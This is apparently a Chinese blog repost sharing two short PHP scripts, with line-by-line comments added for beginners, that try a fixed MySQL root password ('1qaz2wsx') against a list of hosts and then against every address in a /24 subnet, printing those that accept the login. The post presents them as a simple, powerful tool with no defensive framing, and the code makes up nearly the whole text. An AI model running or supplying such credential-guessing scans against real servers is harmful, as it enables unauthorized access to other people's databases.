From:angel’s Blog        /

    刚才上网瞎逛，无意中在小A（angel）的博客上看见的这段程序，写的很简单很强大！呵呵！~是用PHP实现的，我在他写的基础上给加了代码注释，方便不懂PHP的朋友理解，废话不多说，上代码！

    //在已知指定数据库服务器开了3306端口的情况下执行如下PHP脚本进行猜解。

    Code-1:

    <?php

    $hostdb = array(

    ’192.168.168.10’,

    ’192.168.168.20’,

    ’192.168.168.20’,

    ’192.168.168.40’,

    ’192.168.168.50’,

    ’192.168.168.60’,

    ’192.168.168.70’,

    ’192.168.168.80’,

    ’192.168.168.90’,

    ’192.168.168.100’

    );                                  //将这些IP地址放到预定义的数组里面

    $dbu = ’root’;             //这是预先定义好的数据库用户名

    $dbp = ’1qaz2wsx’;   //这是预习定义好的数据库的密码

    foreach ($hostdb as $host) {           //用foreach遍历预先定义的数组

    if(@mysql_connect($host, $dbu, $dbp)) {

    echo $host.’ - ’.$dbu.’ - ’.$dbp.’ ... OK<br>’;      //如果符合预先定义的用户名和密码那么就打印出来

    }

    }

    echo ’done.’;

    ?>

    //如下代码是对指定IP地址段进行扫描。

    Code-2:

    <?php

    $ips = ’192.168.168.’;        //预先定义的网段为C段IP地址段

    $dbu = ’root’;                    //预先定义的用户名

    $dbp = ’1qaz2wsx’;          //预先定义的密码

    for ($i=1; $i<254; $i++) {     //设定for循环，在192.168.1.1的基础上逐一累加直到192.168.1.254

    if(@mysql_connect($ips.$i, $dbu, $dbp)) {        //尝试与其进行连接

    echo $ips.$i.’ - ’.$dbu.’ - ’.$dbp.’ ... OK<br>’;      //如果连接成功，则打印出来

    }

    }

    echo ’done.’;

    ?>